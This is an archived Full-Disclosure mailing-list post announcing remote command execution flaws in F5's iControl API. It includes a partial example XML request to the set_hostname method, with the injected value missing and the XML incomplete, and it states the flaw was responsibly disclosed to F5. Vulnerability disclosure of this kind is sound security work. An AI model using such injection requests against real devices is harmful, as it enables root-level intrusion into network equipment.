lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Date: Wed, 07 May 2014 17:43:55 -0500
From: Brandon Perry <>
To: "" <>
Subject: [FD] Moar F5 fun in iControl API


Linked below is an advisory regarding remote command execution (as root,
possibly) vulnerabilities within the iControl API:

An example request that will set the hostname to '':

<?xml version="1.0" encoding="ISO-8859-1"?>
    <n1:set_hostname xmlns:n1="urn:iControl:System/Inet">

This was responsibly disclosed to F5 on the 7th of February. If you
would like the full communication timeline, feel free to ask.

Sent through the Full Disclosure mailing list
Web Archives & RSS:

Powered by blists - more mailing lists